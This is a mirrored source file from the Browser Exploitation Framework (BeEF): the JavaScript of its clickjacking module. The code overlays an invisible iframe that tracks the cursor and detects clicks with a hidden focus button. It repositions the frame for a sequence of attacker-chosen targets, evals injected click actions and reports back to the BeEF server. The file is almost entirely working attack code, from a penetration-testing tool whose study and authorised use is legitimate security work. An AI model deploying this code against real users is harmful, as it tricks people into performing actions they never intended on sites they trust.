Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/social_engineering/clickjacking/command.js
1873 views
1
/*

2
 * Copyright (c) 2006-2026Wade Alcorn - [email protected]

3
 * Browser Exploitation Framework (BeEF) - https://beefproject.com

4
 * See the file 'doc/COPYING' for copying permission

5
 */

6


7
beef.execute(function() {

8
	var elems = {

9
		outerFrame: "cjFrame",

10
		innerFrame: "innerFrame",

11
		btn: "persistentFocusBtn"

12
	}

13


14
	var clicked = 0;

15
	var src = "<%= @iFrameSrc %>";

16
	var secZone = "<%= @iFrameSecurityZone %>";

17
	var sandbox = "<%= @iFrameSandbox %>";

18
	var visibility = "<%= @iFrameVisibility %>";

19


20
	var clicks = [

21
		{js:"<%= URI::Parser.new.escape(@clickaction_1) %>", posTop:cleanPos("<%= @iFrameTop_1 %>"), posLeft:cleanPos("<%= @iFrameLeft_1 %>")},

22
		{js:"<%= URI::Parser.new.escape(@clickaction_2) %>", posTop:cleanPos("<%= @iFrameTop_2 %>"), posLeft:cleanPos("<%= @iFrameLeft_2 %>")},

23
		{js:"<%= URI::Parser.new.escape(@clickaction_3) %>", posTop:cleanPos("<%= @iFrameTop_3 %>"), posLeft:cleanPos("<%= @iFrameLeft_3 %>")},

24
		{js:"<%= URI::Parser.new.escape(@clickaction_4) %>", posTop:cleanPos("<%= @iFrameTop_4 %>"), posLeft:cleanPos("<%= @iFrameLeft_4 %>")},

25
		{js:"<%= URI::Parser.new.escape(@clickaction_5) %>", posTop:cleanPos("<%= @iFrameTop_5 %>"), posLeft:cleanPos("<%= @iFrameLeft_5 %>")},

26
		{js:"<%= URI::Parser.new.escape(@clickaction_6) %>", posTop:cleanPos("<%= @iFrameTop_6 %>"), posLeft:cleanPos("<%= @iFrameLeft_6 %>")},

27
		{js:"<%= URI::Parser.new.escape(@clickaction_7) %>", posTop:cleanPos("<%= @iFrameTop_7 %>"), posLeft:cleanPos("<%= @iFrameLeft_7 %>")},

28
		{js:"<%= URI::Parser.new.escape(@clickaction_8) %>", posTop:cleanPos("<%= @iFrameTop_8 %>"), posLeft:cleanPos("<%= @iFrameLeft_8 %>")},

29
		{js:"void(0);", posTop:'-', posLeft:'-'}

30
	]

31


32
	var iframeAttrs = {};

33
	iframeAttrs.src = src;

34
	(secZone == "on") ? iframeAttrs.security = "restricted" : "";

35
	(sandbox == "on") ? iframeAttrs.sandbox = "allow-forms" : "";

36


37
	var iframeStyles = {};

38
	iframeStyles.width = "<%= @iFrameWidth %>px";

39
	iframeStyles.height = "<%= @iFrameHeight %>px";

40
	iframeStyles.opacity = (visibility == "on") ? "0.6" : "0.0";

41
	iframeStyles.filter = (visibility == "on") ? "alpha(opacity=60)" : "alpha(opacity=0)";

42


43
	var innerPos = {};

44
	//initialize iframe

45
	innerPos.top = clicks[0].posTop + "px";

46
	innerPos.left = clicks[0].posLeft + "px";

47


48
	//returns a negative version of a number, or if NaN returns a dash

49
	function cleanPos(coordinate) {

50
		var iCoordinate = parseInt(coordinate);

51
		if (isNaN(iCoordinate))

52
			return "-";

53
		else if (iCoordinate > 0)

54
			return (-1 * iCoordinate)

55
		return iCoordinate

56
	}

57


58
	function init(params, styles, stylesInner, callback) {

59
		var container = $j.extend(true, {'border':'none', 'position':'absolute', 'z-index':'100000', 'overflow':'hidden'}, styles);

60
		var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner);

61


62
		var containerDiv = $j('<div id="' + elems.outerFrame + '"></div>').css(container).prependTo('body');

63
		var containerDiv = $j('<input id="' + elems.btn + '" type="button" value="invisible" style="width:1px;height:1px;opacity:0;alpha(opacity=0);margin-left:-200px" />').appendTo('body');

64


65
		var innerIframe = $j('<iframe id="' + elems.innerFrame + '" scrolling="no" />').attr(params).css(inner).load(callback).prependTo('#' + elems.outerFrame);

66


67
		return containerDiv;

68
	}

69


70
	function step1(){

71
		var btnSelector = "#" + elems.btn;

72
		var outerSelector = "#" + elems.outerFrame;

73
		var btnObj = $j(btnSelector);

74
		var outerObj = $j(outerSelector);

75


76
		$j("body").mousemove(function(e) {

77
			$j(outerObj).css('top', e.pageY);

78
			$j(outerObj).css('left', e.pageX);

79
		});

80


81
		$j(btnObj).focus();

82
		$j(btnObj).focusout(function() {

83
			cjLog("Iframe clicked");

84
			iframeClicked();

85
		});

86
	}

87


88
	function iframeClicked(){

89
		clicked++;

90
		var jsfunc = '';

91
		jsfunc = clicks[clicked-1].js;

92
		innerPos.top = clicks[clicked].posTop;

93
		innerPos.left = clicks[clicked].posLeft;

94
		eval(unescape(jsfunc));

95
		setTimeout(function(){

96
			updateIframePosition();

97
		}, <%= @clickDelay %>);

98


99
		setTimeout(function(){

100
			var btnSelector = "#" + elems.btn;

101
			var btnObj = $j(btnSelector);

102
			$j(btnObj).focus();

103


104
			//check if there are any more actions to perform

105
			try {

106
				if (isNaN(parseInt(clicks[clicked].posTop))) {

107
					removeAll(elems);

108
					throw "No more clicks.";

109
				}

110
			} catch(e) {

111
				cjLog(e);

112
			}

113
		}, 200);

114
	}

115


116
	function updateIframePosition(){

117
		var innerSelector = "#" + elems.innerFrame;

118
		var innerObj = $j(innerSelector);

119
		$j(innerObj).css('top', innerPos.top + 'px');

120
		$j(innerObj).css('left', innerPos.left + 'px');

121
	}

122


123
	//Remove outerFrame and persistent button

124
	function removeAll(){

125
		$j("#" + elems.outerFrame).remove();

126
		$j("#" + elems.btn).remove();

127
	}

128


129
	function cjLog(msg){

130
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + msg);

131
	}

132


133
	init(iframeAttrs, iframeStyles, innerPos,

134
		function() {

135
			step1();

136
			cjLog("Iframe successfully created.");

137
		}

138
	);

139
});

140


141